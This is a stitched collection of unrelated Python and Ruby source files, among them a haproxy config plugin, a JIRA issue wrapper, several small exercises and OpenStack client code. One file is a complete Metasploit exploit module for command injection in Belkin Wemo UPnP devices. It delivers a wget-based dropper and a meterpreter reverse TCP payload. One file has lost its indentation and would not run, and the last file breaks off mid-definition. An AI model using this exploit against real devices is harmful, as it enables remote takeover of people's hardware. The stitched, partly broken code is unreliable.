    parser.add_argument('-m', '--model_dir', required=True,
                        help='Model save/load directory')
    parser.add_argument('-p', '--parallel_path', required=True,
                        help='Path to tokenized parallel corpus')
    parser.add_argument('-i', '--inverse', action='store_true',
                        help='Train for backtranslation (target -> source)')
    training_args, args = parser.parse_args_into_dataclasses()
    main(training_args, args)
|
import random
from rollbar.lib import build_key_matcher
from rollbar.lib.transform import Transform
class ScrubTransform(Transform):
    """Transform that replaces values whose key matches one of the
    configured key suffixes with a redaction string."""

    suffix_matcher = None

    def __init__(self, suffixes=None, redact_char='*', randomize_len=True):
        """
        :param suffixes: key suffixes to scrub (None/empty disables scrubbing)
        :param redact_char: character used to build the redaction string
        :param randomize_len: use a random length instead of the value's length
        """
        super(ScrubTransform, self).__init__()
        if suffixes is not None and len(suffixes) > 0:
            self.suffix_matcher = build_key_matcher(suffixes, type='suffix')
        self.redact_char = redact_char
        self.randomize_len = randomize_len

    def in_scrub_fields(self, key):
        """Return True when *key* matches a configured scrub suffix."""
        if self.suffix_matcher is None:
            return False
        return self.suffix_matcher(key)

    def redact(self, val):
        """Build the redaction string that replaces *val*."""
        if self.randomize_len:
            # Random length so the output doesn't leak the secret's size.
            _len = random.randint(3, 20)
        else:
            try:
                _len = len(val)
            except TypeError:
                # BUG FIX: was a bare `except:`; only unsized values
                # (ints, None, ...) should fall back to their str() length.
                _len = len(str(val))
        return self.redact_char * _len

    def default(self, o, key=None):
        if self.in_scrub_fields(key):
            return self.redact(o)
        return o


__all__ = ['ScrubTransform']
|
import logging
import datetime
import traceback
from autobahn.twisted.util import sleep
import inject
from mcloud.application import ApplicationController
from mcloud.container import PrebuiltImageBuilder, InlineDockerfileImageBuilder, VirtualFolderImageBuilder
from mcloud.deployment import DeploymentController, IDeploymentPublishListener
from mcloud.events import EventBus
from mcloud.plugin import IMcloudPlugin
from mcloud.plugins import Plugin, PluginInitError
from mcloud.remote import ApiRpcServer
from mcloud.service import Service, IServiceLifecycleListener
import os
from twisted.internet import reactor, defer
from twisted.internet.defer import inlineCallbacks
from twisted.python import log
from zope.interface import implements
import re
HAPROXY_TPL = """
defaults
option dontlognull
timeout connect 5000
timeout client 50000
timeout server 50000
{% if ssl_apps %}
frontend http_ssl_proxy
mode tcp
bind 0.0.0.0:443
tcp-request inspect-delay 5s
tcp-request content accept if { req_ssl_hello_type 1 }
{% for app in ssl_apps %}
{% for domain in app.domains %}
acl is_ssl_{{ app.name }} req_ssl_sni -i {{ domain }}
{% endfor %}
use_backend backend_ssl_{{ app.name }}_cluster if is_ssl_{{ app.name }}
{% endfor %}
{% for app in ssl_apps %}
{% for backend in app.backends %}
backend {{ backend.name }}_cluster
mode tcp
# maximum SSL session ID length is 32 bytes.
stick-table type binary len 32 size 30k expire 30m
acl clienthello req_ssl_hello_type 1
acl serverhello rep_ssl_hello_type 2
# use tcp content accepts to detects ssl client and server hello.
tcp-request inspect-delay 5s
tcp-request content accept if clienthello
# no timeout on response inspect delay by default.
tcp-response content accept if serverhello
stick on payload_lv(43,1) if clienthello
# Learn on response if server hello.
stick store-response payload_lv(43,1) if serverhello
option ssl-hello-chk
server {{ backend.name }} {{ backend.ip }}:{{ backend.port }} check
{% endfor %}
{% endfor %}
{% endif %}
frontend http_proxy
bind 0.0.0.0:80
mode http
option httpclose
option forwardfor
{% for app in apps %}
{% for domain in app.domains %}
acl is_{{ app.name }} hdr(host) -i {{ domain }}
{% endfor %}
use_backend backend_{{ app.name }}_cluster if is_{{ app.name }}
{% endfor %}
{% for app in apps %}
{% for backend in app.backends %}
backend {{ backend.name }}_cluster
mode http
server {{ backend.name }} {{ backend.ip }}:{{ backend.port }}
{% endfor %}
{% endfor %}
"""
from jinja2 import Template
logger = logging.getLogger('mcloud.plugin.haproxy')
class HaproxyPlugin(Plugin):
    """Keeps one haproxy container per deployment in sync with the routable
    applications: regenerates haproxy.cfg and rebuilds the mcloud_haproxy
    service whenever a web/ssl service starts or a domain is (un)published."""
    implements(IMcloudPlugin, IServiceLifecycleListener, IDeploymentPublishListener)

    eb = inject.attr(EventBus)
    settings = inject.attr('settings')
    rpc_server = inject.attr(ApiRpcServer)
    dep_controller = inject.attr(DeploymentController)
    app_controller = inject.attr(ApplicationController)

    @inlineCallbacks
    def dump(self):
        """Build the haproxy template context:
        {deployment_name: {'apps': [...], 'ssl_apps': [...]}}."""
        deployments = {}
        app_list = yield self.app_controller.list()
        for app in app_list:
            if not app['deployment'] in deployments:
                deployments[app['deployment']] = {
                    'apps': [],
                    'ssl_apps': []
                }
            # if not 'web_target' in app or not app['web_target']:
            #     continue
            # The app-level web target always serves the app's full name.
            plain_domains = {app['web_target']: [app['fullname']]}
            ssl_domains = {}
            if app['public_urls']:
                for target in app['public_urls']:
                    if not target['service']:
                        # URL routed to the app-level web/ssl targets.
                        if 'ssl_target' in app and app['ssl_target'] and target['url'].startswith('https://'):
                            if not app['ssl_target'] in ssl_domains:
                                ssl_domains[app['ssl_target']] = []
                            ssl_domains[app['ssl_target']].append(target['url'][8:])  # strip 'https://'
                        if 'web_target' in app and app['web_target'] and not target['url'].startswith('https://'):
                            if not app['web_target'] in plain_domains:
                                plain_domains[app['web_target']] = []
                            plain_domains[app['web_target']].append(target['url'])
                    else:
                        # URL routed to a named service inside the app.
                        for service in app['services']:
                            if not service['ip']:
                                continue
                            if service['shortname'] == target['service']:
                                # NOTE(review): this mutates service['ip'] in
                                # place; multiple targets for the same service
                                # would re-append the port/suffix -- confirm.
                                if 'port' in target and target['port']:
                                    service['ip'] = service['ip'] + ':' + target['port']
                                if 'send-proxy' in service and service['send-proxy']:
                                    service['ip'] = service['ip'] + '@send-proxy'
                                if target['url'].startswith('https://'):
                                    if not service['ip'] in ssl_domains:
                                        ssl_domains[service['ip']] = []
                                    ssl_domains[service['ip']].append(target['url'][8:])
                                else:
                                    if not service['ip'] in plain_domains:
                                        plain_domains[service['ip']] = []
                                    plain_domains[service['ip']].append(target['url'])

            def format_name(name):
                # haproxy identifiers: collapse dots/dashes/whitespace to '_'.
                return re.sub('[\.\-\s]+', '_', str(name))

            if ssl_domains:
                for ip, domains in ssl_domains.items():
                    port = 443
                    if ':' in ip:
                        ip, port = ip.split(':')
                    deployments[app['deployment']]['ssl_apps'].append({
                        'name': '%s_%s_%s' % (app['fullname'], format_name(ip), format_name(port)),
                        'domains': domains,
                        'backends': [{'name': 'backend_ssl_%s_%s_%s' % (app['fullname'], format_name(ip), format_name(port)), 'ip': ip, 'port': port}]
                    })

            for ip, domains in plain_domains.items():
                if ip is None:
                    continue
                port = 80
                if ':' in ip:
                    ip, port = ip.split(':')
                deployments[app['deployment']]['apps'].append({
                    'name': '%s_%s_%s' % (app['fullname'], format_name(ip), format_name(port)),
                    'domains': domains,
                    'backends': [{'name': 'backend_%s_%s_%s' % (app['fullname'], format_name(ip), format_name(port)), 'ip': ip, 'port': port}]
                })
        log.msg('Writing haproxy config')
        defer.returnValue(deployments)

    @inlineCallbacks
    def rebuild_haproxy(self, deployments=None, ticket_id=None):
        """Render haproxy.cfg and rebuild the mcloud_haproxy container.

        :param deployments: deployment names to rebuild (None = all)
        :param ticket_id: optional RPC ticket used for progress reporting
        """
        # generate new haproxy config
        all_deployments = yield self.dump()
        for deployment_name, config in all_deployments.items():
            # rebuild only needed deployments
            if deployments and not deployment_name in deployments:
                continue
            if ticket_id:
                self.rpc_server.task_progress('Updating haproxy config on deployment %s' % deployment_name, ticket_id)
            deployment = yield self.dep_controller.get(deployment_name)
            haproxy_path = os.path.expanduser('%s/haproxy/%s' % (self.settings.home_dir, deployment_name))
            if not os.path.exists(haproxy_path):
                os.makedirs(haproxy_path)
            template_path = os.path.join(haproxy_path, 'haproxy.tpl')
            haproxy_config_path = os.path.join(haproxy_path, 'haproxy.cfg')
            # Seed the on-disk template once; it may be customised afterwards.
            if not os.path.exists(template_path):
                with open(template_path, 'w+') as f:
                    f.write(HAPROXY_TPL)
            with open(template_path) as f:
                template = Template(f.read())
            config_rendered = template.render(config)
            with open(haproxy_config_path, 'w+') as f:
                f.write(config_rendered)
            # Bake the rendered config into a small haproxy image and rebuild.
            haproxy = Service(client=deployment.get_client())
            haproxy.name = 'mcloud_haproxy'
            haproxy.image_builder = VirtualFolderImageBuilder({
                'Dockerfile': """
FROM haproxy:1.5
ADD haproxy.cfg /usr/local/etc/haproxy/haproxy.cfg
""",
                'haproxy.cfg': config_rendered
            })
            haproxy.ports = ['80/tcp:80', '443/tcp:443']
            # haproxy.volumes = [{
            #     'local': haproxy_path,
            #     'remote': '/etc/haproxy'
            # }]
            logger.info('Containers updated: dumping haproxy config.')
            if ticket_id:
                self.rpc_server.task_progress('updated %s - OK' % deployment_name, ticket_id)
            yield haproxy.rebuild()

    @inlineCallbacks
    def on_service_start(self, service, ticket_id=None):
        """Rebuild the owning deployment's haproxy when a web/ssl service
        (other than haproxy itself) starts.

        :param service:
        :type service: mcloud.service.Service
        :return:
        """
        print 'Service start', service
        if service.name != 'mcloud_haproxy' and (service.is_web() or service.is_ssl()):
            app = yield self.app_controller.get(service.app_name)
            if ticket_id:
                self.rpc_server.task_progress('Updating haproxy config', ticket_id)
            deployment = yield app.get_deployment()
            yield self.rebuild_haproxy(deployments=[deployment.name], ticket_id=ticket_id)

    @inlineCallbacks
    def on_domain_publish(self, deployment, domain, ticket_id=None):
        """
        Called when a domain is being published.
        """
        if ticket_id:
            self.rpc_server.task_progress('Updating haproxy config for deployment %s' % deployment.name, ticket_id)
        yield self.rebuild_haproxy(deployments=[deployment.name])

    @inlineCallbacks
    def on_domain_unpublish(self, deployment, domain, ticket_id=None):
        """
        Called when a domain is being unpublished.
        """
        if ticket_id:
            self.rpc_server.task_progress('Updating haproxy config for deployment %s' % deployment.name, ticket_id)
        yield self.rebuild_haproxy(deployments=[deployment.name])

    @inlineCallbacks
    def setup(self):
        """Plugin entry point: build all haproxy configs once at startup."""
        yield self.rebuild_haproxy()
|
# O(1) constant -- touches a single element regardless of input size.
def func_constaant(values):  # (sic: typo kept; renaming would change the module API)
    return values[0]

lst = [1,2,3]
print(func_constaant(lst))
#----------------------------------
# O(n) Linear -- visits each element once; returns None, so the outer
# print() below prints "None" after the per-element output.
def func_linear(lst):
    for val in lst:
        print(val)

print(func_linear(lst))
#----------------------------------
#O(n^2) Quadratic -- nested loops over the same list: n*n pairs.
def func_quadratic(lst):
    for val1 in lst:
        for val2 in lst:
            print (val1, val2)

print(func_quadratic(lst))
def readFile(path='/Users/ArpitAggarwal/workspace/jython-basics/com/test.csv'):
    """Print the file object and each line of *path* with trailing
    whitespace stripped.

    The path is now a parameter (default keeps the original hard-coded
    location, so existing callers are unaffected).
    """
    f = open(path, 'r')
    print(f)
    for line in f:
        print(line.rstrip())
    # BUG FIX: the original said `f.close` without parentheses, which never
    # closed the file handle.
    f.close()
def copyCSVToTextFile(src='/Users/ArpitAggarwal/workspace/jython-basics/com/test.csv',
                      dst='/Users/ArpitAggarwal/workspace/jython-basics/com/test.txt'):
    """Copy *src* to *dst* line by line, stripping trailing whitespace.

    Paths are now parameters (defaults keep the original hard-coded
    locations, so existing callers are unaffected).
    """
    f = open(src, 'r')
    output = open(dst, 'w')
    for line in f:
        output.write(line.rstrip() + '\n')
    # BUG FIX: the original never closed `output`, so buffered data could be
    # lost on Jython/CPython without refcounting guarantees.
    output.close()
    f.close()
# Demo invocations against the hard-coded default paths.
readFile()
copyCSVToTextFile()
|
class Solution(object):
    def wiggleMaxLength(self, nums):
        """
        Length of the longest wiggle subsequence: start from len(nums) and
        subtract one for every element that repeats its predecessor or
        continues the current direction.

        :type nums: List[int]
        :rtype: int
        """
        if not nums:
            return 0
        if len(nums) == 1:
            return 1
        if len(nums) == 2:
            return 2 if nums[0] != nums[1] else 1
        count = len(nums)
        direction = -1  # -1 = unknown yet, 1 = last move rose, 0 = last move fell
        last = nums[0]
        for current in nums[1:]:
            rising = last < current
            falling = last > current
            # Drop duplicates and moves that extend an existing run.
            if (not rising and not falling) \
                    or (rising and direction == 1) \
                    or (falling and direction == 0):
                count -= 1
            if rising:
                direction = 1
            elif falling:
                direction = 0
            last = current
        return count
|
from copy import copy
import re


class Issue(object):
    """Lightweight wrapper around a JIRA issue JSON payload."""

    def __init__(self, json):
        self.__key = json['key']
        # Outward links are issues this one blocks; inward links block it.
        self.__blocks = [i['outwardIssue']['key'] for i in json['fields']['issuelinks'] if 'outwardIssue' in i]
        self.__blocked_by = [i['inwardIssue']['key'] for i in json['fields']['issuelinks'] if 'inwardIssue' in i]
        self.__summary = json['fields']['summary']
        self.__sprint = None
        # customfield_10004 holds sprint descriptors like
        # "...,name=Sprint 1,startDate=..."; extract the name part.
        if 'customfield_10004' in json['fields'] and json['fields']['customfield_10004']:
            m = re.search(r"name=.*,start", json['fields']['customfield_10004'][0])
            if m:
                self.__sprint = json['fields']['customfield_10004'][0][m.start() + len("name="):m.end() - len(",start")]
        self.__points = 0
        # customfield_10002 is story points; may be missing, None or non-numeric.
        if 'customfield_10002' in json['fields']:
            try:
                self.__points = int(json['fields']['customfield_10002'])
            except (TypeError, ValueError):
                # Merged the two identical pass-only except blocks.
                pass

    def blocks(self):
        """Keys of issues this issue blocks (defensive copy)."""
        return copy(self.__blocks)

    def blocked_by(self):
        """Keys of issues blocking this issue (defensive copy)."""
        return copy(self.__blocked_by)

    def node_name(self):
        """Graph-node label: 'KEY, sprint[points]\\nsummary' without colons."""
        s = self.__key + ", " + str(self.__sprint) + "[" + str(self.__points) + "]" + "\n" + str(self.__summary)
        return s.replace(':', '')

    def __str__(self):
        return self.__key + ": " + self.__summary
|
###############################
# Count symbols in the message
###############################
import pprint

# The text whose character frequencies we tally.
message = 'This is a test message.'

# Frequency table: symbol -> number of occurrences.
count = {}
for symbol in message:
    # dict.get supplies 0 for symbols we haven't seen yet, so a single
    # expression handles both the first and subsequent occurrences.
    count[symbol] = count.get(symbol, 0) + 1

# Show final dictionary
print(count)
# # Uncomment for nice look
# pprint.pprint(count)
|
from fourthpack.pages.home.pizza_page import PizzaPage
import unittest
import pytest


@pytest.mark.usefixtures("OneTimeSetUp", "SetUp")
class orderPizzaTest(unittest.TestCase):
    """Orders a pizza through the PizzaPage page object."""

    # NOTE(review): unittest.TestCase.__init__ normally receives a test
    # method name, not a webdriver; passing `driver` through super() here
    # looks broken -- confirm how this suite is actually instantiated.
    def __init__(self, driver):
        super().__init__(driver)
        self.driver = driver

    @pytest.fixture(autouse=True)
    def objectSetup (self, OneTimeSetUp):
        # Build the page object against the session driver before each test.
        self.pizza = PizzaPage(self.driver)

    @pytest.mark.run(order=1)
    def test_pizzaRecipe(self):
        self.pizza.OrderThePizza()
|
# Angkan Biswas
# 16.04.2020
# To mark face in taken picture.
# Note: 1. Download 'haarcascade_frontalface_default.xml'
# $ wget https://github.com/opencv/opencv/blob/master/data/haarcascades/haarcascade_frontalface_default.xml
# 2. Install 'opencv-contrib-python'
# $ pip install opencv-contrib-python
import cv2

# Load the pre-trained frontal-face Haar cascade shipped with OpenCV.
model = cv2.CascadeClassifier(cv2.data.haarcascades + 'haarcascade_frontalface_default.xml')
camera = cv2.VideoCapture(0)
_, picture = camera.read()  # Take a single frame from the default camera
faces = model.detectMultiScale(picture)  # (x, y, w, h) box per detected face
for x,y,w,h in faces:
    # Draw a blue 2px rectangle around each face.
    cv2.rectangle(picture, (x, y), (x + w, y + h), (255, 0, 0), 2)
cv2.imshow("MyFace", picture)
cv2.waitKey(0)  # Hold display window until a key press
camera.release()
|
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Exploits a command injection in the Belkin Wemo UPnP API: the SmartDevURL
# argument of the SetSmartDevInfo SOAP action is interpolated into a shell
# command on the device.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Belkin Wemo UPnP Remote Code Execution',
      'Description' => %q{
        This module exploits a command injection in the Belkin Wemo UPnP API via
        the SmartDevURL argument to the SetSmartDevInfo action.

        This module has been tested on a Wemo-enabled Crock-Pot, but other Wemo
        devices are known to be affected, albeit on a different RPORT (49153).
      },
      'Author' => [
        'phikshun', # Discovery, UFuzz, and modules
        'wvu',      # Crock-Pot testing and module
        'nstarke'   # Version-checking research and implementation
      ],
      'References' => [
        ['URL', 'https://web.archive.org/web/20150901094849/http://disconnected.io/2014/04/04/universal-plug-and-fuzz/'],
        ['URL', 'https://github.com/phikshun/ufuzz'],
        ['URL', 'https://gist.github.com/phikshun/10900566'],
        ['URL', 'https://gist.github.com/phikshun/9984624'],
        ['URL', 'https://www.crock-pot.com/wemo-landing-page.html'],
        ['URL', 'https://www.belkin.com/us/support-article?articleNum=101177'],
        ['URL', 'http://www.wemo.com/']
      ],
      'DisclosureDate' => '2014-04-04',
      'License' => MSF_LICENSE,
      'Platform' => ['unix', 'linux'],
      'Arch' => [ARCH_CMD, ARCH_MIPSLE],
      'Privileged' => true,
      'Targets' => [
        ['Unix In-Memory',
          'Platform' => 'unix',
          'Arch' => ARCH_CMD,
          'Type' => :unix_memory,
          'DefaultOptions' => {
            'PAYLOAD' => 'cmd/unix/generic'
          }
        ],
        ['Linux Dropper',
          'Platform' => 'linux',
          'Arch' => ARCH_MIPSLE,
          'Type' => :linux_dropper,
          'DefaultOptions' => {
            'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp'
          }
        ]
      ],
      'DefaultTarget' => 1,
      'Notes' => {
        'NOCVE' => 'Patched in 2.00.8643 without vendor disclosure',
        'Stability' => [CRASH_SAFE],
        'SideEffects' => [ARTIFACTS_ON_DISK],
        'Reliability' => [REPEATABLE_SESSION]
      }
    ))

    register_options([
      Opt::RPORT(49152)
    ])

    register_advanced_options([
      OptBool.new('ForceExploit', [true, 'Override check result', false]),
      OptString.new('WritableDir', [true, 'Writable directory', '/tmp'])
    ])
  end

  # Fingerprint the device via /setup.xml and compare the firmware version
  # against the patched 2.00.8643 release.
  def check
    checkcode = CheckCode::Unknown

    res = send_request_cgi(
      'method' => 'GET',
      'uri' => '/setup.xml'
    )

    unless res && res.code == 200 && res.body.include?('urn:Belkin:device:')
      vprint_error('Wemo-enabled device not detected')
      return checkcode
    end

    vprint_good('Wemo-enabled device detected')
    checkcode = CheckCode::Detected

    # Extract "WeMo_WW_<version>" from the firmwareVersion XML element.
    version = (v = res.get_xml_document.at('firmwareVersion')&.text) &&
              v =~ /WeMo_WW_(\d+(?:\.\d+)+)/ && $1 && Gem::Version.new($1)

    unless version
      vprint_error('Could not determine firmware version')
      return checkcode
    end

    vprint_status("Found firmware version: #{version}")

    # https://www.tripwire.com/state-of-security/featured/my-sector-story-root-shell-on-the-belkin-wemo-switch/
    if version < Gem::Version.new('2.00.8643')
      vprint_good("Firmware version #{version} < 2.00.8643")
      checkcode = CheckCode::Appears
    else
      vprint_error("Firmware version #{version} >= 2.00.8643")
      checkcode = CheckCode::Safe
    end

    checkcode
  end

  def exploit
    checkcode = check

    unless datastore['ForceExploit']
      unless checkcode == CheckCode::Appears
        fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')
      end
    end

    case target['Type']
    when :unix_memory
      execute_command(payload.encoded)
    when :linux_dropper
      cmdstager = generate_cmdstager(
        flavor: :wget,
        temp: datastore['WritableDir'],
        file: File.basename(cmdstager_path),
        noconcat: true
      )

      # HACK: "chmod +x" -- the device lacks chmod, so copy /bin/sh over the
      # stager path to get an executable file instead.
      cmdstager.unshift("cp /bin/sh #{cmdstager_path}")
      cmdstager.delete_if { |cmd| cmd.start_with?('chmod +x') }

      cmdstager = cmdstager.join(';')

      vprint_status("Regenerated command stager: #{cmdstager}")

      execute_command(cmdstager)
    end
  end

  # Send the SOAP request that injects *cmd* via SmartDevURL.
  def execute_command(cmd, opts = {})
    send_request_cgi(
      'method' => 'POST',
      'uri' => '/upnp/control/basicevent1',
      'ctype' => 'text/xml',
      'headers' => {
        'SOAPACTION' => '"urn:Belkin:service:basicevent:1#SetSmartDevInfo"'
      },
      'data' => generate_soap_xml(cmd)
    )
  end

  # Build the SetSmartDevInfo envelope; $(...) executes cmd on the device.
  def generate_soap_xml(cmd)
    <<~EOF
      <?xml version="1.0" encoding="utf-8"?>
      <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
      <s:Body>
      <u:SetSmartDevInfo xmlns:u="urn:Belkin:service:basicevent:1">
      <SmartDevURL>$(#{cmd.encode(xml: :text)})</SmartDevURL>
      </u:SetSmartDevInfo>
      </s:Body>
      </s:Envelope>
    EOF
  end

  # Random writable path for the dropped stager (memoized per run).
  def cmdstager_path
    @cmdstager_path ||=
      "#{datastore['WritableDir']}/#{rand_text_alphanumeric(8..42)}"
  end
end
|
from __future__ import unicode_literals
from pyramid.httpexceptions import HTTPBadRequest
from pyramid.view import view_config
from ... import models
from ...db import db_transaction
from ...renderers import file_adapter
from ..base import ControllerBase
from ..base import view_defaults
from .resources import FileIndexResource
from .resources import FileResource
@view_defaults(context=FileIndexResource)
class FileIndexController(ControllerBase):
    """Collection endpoint for files inside a session."""

    @view_config(request_method='POST')
    def post(self):
        """Create a file in the session from multipart form data.

        Requires an `aes_iv` part when the session is encrypted; publishes
        a file-created event and responds 201 with the new file.
        """
        # settings = self.request.registry.settings
        with db_transaction():
            aes_iv = None
            if 'aes_iv' in self.request.params:
                # aes_iv arrives as an uploaded part; read the raw bytes.
                aes_iv = self.request.params['aes_iv'].file.read()
            if self.context.entity.encrypted and aes_iv is None:
                return HTTPBadRequest(
                    'Need to provide aes_iv for encrypted session'
                )
            file_ = models.File.create(
                session=self.context.entity,
                filename=self.request.params['file'].filename,
                mime_type=self.request.params['file'].type,
                content=self.request.params['file'].file.read(),
                aes_iv=aes_iv,
            )
            self.publish_event(
                file_.session.guid,
                dict(file=file_adapter(file_, self.request)),
            )
            self.request.response.status = '201 Created'
            return dict(file=file_)
@view_defaults(context=FileResource)
class FileController(ControllerBase):
    """Single-file endpoint."""

    @view_config(request_method='GET')
    def get(self):
        """Return the file entity resolved by the route context."""
        return dict(file=self.context.entity)
|
# Walk a diamond-shaped keypad following U/D/L/R instructions (one code
# digit per input line); moves that would land on a blank cell are ignored.
instructions = map(lambda x: x.strip(), open('input.txt').readlines())
# Keypad padded with blanks so neighbour lookups never go out of range.
keypad = [
    '       ',
    '   1   ',
    '  234  ',
    ' 56789 ',
    '  ABC  ',
    '   D   ',
    '       '
]
code = ''
current = [3, 1]  # start on the '5' key (row 3, column 1)
for instruction in instructions:
    for move in instruction:
        if move == 'U' and keypad[current[0]-1][current[1]] != ' ':
            current[0] -= 1
        if move == 'D' and keypad[current[0]+1][current[1]] != ' ':
            current[0] += 1
        if move == 'L' and keypad[current[0]][current[1]-1] != ' ':
            current[1] -= 1
        if move == 'R' and keypad[current[0]][current[1]+1] != ' ':
            current[1] += 1
    # One key appended per instruction line.
    code += keypad[current[0]][current[1]]
print code
|
#!/usr/bin/python3.5
'''
This program takes EHMM lab files as input and writes numeric text features as
output
Inputs:
[1] Unique phones list
[2] EHMM lab directory
Outputs:
[1] Output directory
Note1: This is intended for seq2seq/end2end learning and hence durations are
not used.
Author: Sivanand Achanta
Date V0: 03-09-2017
'''
import argparse
import os
import csv
# Create a dictionary for unique phones in the dataset
# Create a dictionary for unique phones in the dataset
def uniq_phns(opt):
    '''
    Inputs:
    [1] opt.uniqphns_file: file containing the uniq phones of the language
    Outputs:
    [1] phns_dict: dictionary with phones as keys and numeric indices as values
    '''
    with open(opt.uniqphns_file) as handle:
        # NOTE: line[:-2] drops the last two characters of every line --
        # presumably a trailing "\r\n"; verify against the data files.
        symbols = [row[:-2] for row in handle]
    return {sym: idx for idx, sym in enumerate(symbols)}
# Read EHMM Label file
# Read EHMM Label file
def read_ehmmfile(in_file):
    '''
    Inputs:
    [1] in_file: ehmm lab file
    Outputs:
    [1] phone_list: list of phones in the lab file
    '''
    # BUG FIX: the original opened the file and never closed it; the context
    # manager guarantees the handle is released.
    with open(in_file, 'r') as fidr:
        fidr.readline()  # remove the first line (#)
        ehmm_obj = csv.reader(fidr, delimiter=' ')
        phone_list = [col[2] for col in ehmm_obj]
    return phone_list
def convert_ph2id(phns_dict, phone_list):
    """Map each phone symbol to its numeric id via *phns_dict*."""
    return list(map(phns_dict.__getitem__, phone_list))
# Helper function to process the entire EHMM directory
def process_ehmmdir(phns_dict, opt):
for f in os.listdir(opt.ehmm_dir):
fname, ext = os.path.splitext(f)
if ext == '.lab':
print('Processing file ' + fname)
labfile = os.path.join(opt.ehmm_dir, f)
phone_list = read_ehmmfile(labfile)
# convert phone_list to phone_id (numeric format)
phone_id = convert_ph2id(phns_dict, phone_list)
# write the list to output file
out_file = opt.out_dir + fname + '.tfeat'
fo = open(out_file, 'w')
for item in phone_id:
fo.write("%s\n" % item)
fo.close()
if __name__ == "__main__":
# parse the arguments
parser = argparse.ArgumentParser()
parser.add_argument('--uniqphns_file', required=True, help='uniqphns.txt')
parser.add_argument('--ehmm_dir', required=True, help='/voices/lab/')
parser.add_argument('--out_dir', required=True, help='../feats/tfeats/')
opt = parser.parse_args()
print(opt)
# prepare the output directories
try:
os.makedirs(opt.out_dir)
except OSError:
pass
# make uniqe phones dictionary
phns_dict = uniq_phns(opt)
print(phns_dict)
print(len(phns_dict))
# process ehmm dir to extract text feats
process_ehmmdir(phns_dict, opt)
|
# Licensed to the StackStorm, Inc ('StackStorm') under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# from mock import MagicMock
from github_base_action_test_case import GitHubBaseActionTestCase
from store_oauth_token import StoreOauthTokenAction
class StoreOauthTokenActionTestCase(GitHubBaseActionTestCase):
    """Tests for StoreOauthTokenAction: github_type routing of the datastore
    key and whitespace-stripping of the stored token value."""
    __test__ = True
    action_cls = StoreOauthTokenAction

    def _store_and_check(self, config, token, github_type, datastore_key):
        # Run the action and verify both the returned dict and the value
        # persisted under the expected datastore key.
        action = self.get_action_instance(config)
        results = action.run(user="octocat",
                             token=token,
                             github_type=github_type)
        self.assertEqual(results, {'github_type': github_type})
        self.assertEqual("foo", action.action_service.get_value(datastore_key))

    def test_run_uses_online(self):
        self._store_and_check(self.enterprise_config, "foo", "online",
                              "token_octocat")

    def test_run_uses_enterprise(self):
        self._store_and_check(self.enterprise_config, "foo", "enterprise",
                              "token_enterprise_octocat")

    def test_run_token_string_whitespace_start(self):
        self._store_and_check(self.full_config, " foo", "online",
                              "token_octocat")

    def test_run_token_string_whitespace_end(self):
        self._store_and_check(self.full_config, "foo ", "online",
                              "token_octocat")

    def test_run_token_string_whitespace_both(self):
        self._store_and_check(self.full_config, " foo ", "online",
                              "token_octocat")
|
# -*- coding: utf-8 -*-
"""
Created on Fri Nov 15 19:29:29 2019
@author: CEC
"""
# Read an integer from the user (expected between -10 and 10; not validated).
a = int(input("Ingrese un numero entre -10 a 10: "))
v = []
for i in range(-11, 10):
    i += 1
    v.append(i)  # builds the list [-10, -9, ..., 10]
# BUG FIX: v[4] is an int, so v[4][1] raised "TypeError: 'int' object is not
# subscriptable". Print the fifth element itself.
print(v[4])
''' if a <= i:
    print("No es mayor que", i)
elif a>= i:
    print("Si es mayor que", i)
else:
    print("Esta en el rango") '''
|
"""
General-purpose utility functions.
"""
import re
def camelcase_to_underscore(camelcase_str):
    """
    Convert a CamelCase string to lower-case snake_case.

    Consecutive capitals (acronyms) are kept together, and any run of
    underscores in the result is collapsed to a single one.
    """
    step_one = re.sub(r'(.)([A-Z][a-z]+)', r'\1_\2', camelcase_str)
    step_two = re.sub(r'([a-z0-9])([A-Z])', r'\1_\2', step_one)
    return re.sub(r'_+', '_', step_two.lower())
|
from keystoneclient.access import AccessInfoV2
from keystoneclient.auth.identity import BaseIdentityPlugin
from keystoneclient.auth.identity.access import AccessInfoPlugin
from keystoneclient.auth.identity.v2 import Password
from keystoneclient.session import Session
import keystoneclient.v2_0.client as keystone_sclient
import ceilometerclient.v2.client as ceilometer_client
import cinderclient.v2.client as cinder_client
import novaclient.v2.client as nova_client
import neutronclient.v2_0.client as neutron_client
class OpenstackClientBase:
    """Holds an authenticated keystone Session and lazily builds one API
    client per OpenStack service from it."""

    # Cached client instances, created on first property access.
    _keystone_client = None
    _ceilometer_client = None
    _cinder_client = None
    _nova_client = None
    _neutron_client = None

    def __init__(self, session:Session):
        self._session = session

    @classmethod
    def init_by_plugin(cls, plugin:BaseIdentityPlugin) -> 'OpenstackClientBase':
        # Wrap any keystone identity plugin in a Session.
        return cls(Session(auth=plugin))

    @classmethod
    def init_by_creds(cls, tenant_id, os_username, os_password, auth_url) -> 'OpenstackClientBase':
        # Username/password authentication (Keystone v2).
        plugin = Password(auth_url=auth_url, username=os_username, password=os_password, tenant_id=tenant_id)
        return cls.init_by_plugin(plugin)

    @classmethod
    def init_by_token(cls, token) -> 'OpenstackClientBase':
        # Re-use an existing token; *token* is a dict of AccessInfoV2 kwargs.
        plugin = AccessInfoPlugin(auth_ref=AccessInfoV2(**token))
        return cls.init_by_plugin(plugin)

    @property
    def keystone_client(self) -> keystone_sclient.Client:
        if not self._keystone_client:
            self._keystone_client = keystone_sclient.Client(session=self._session)
        return self._keystone_client

    @property
    def ceilometer_client(self) -> ceilometer_client.Client:
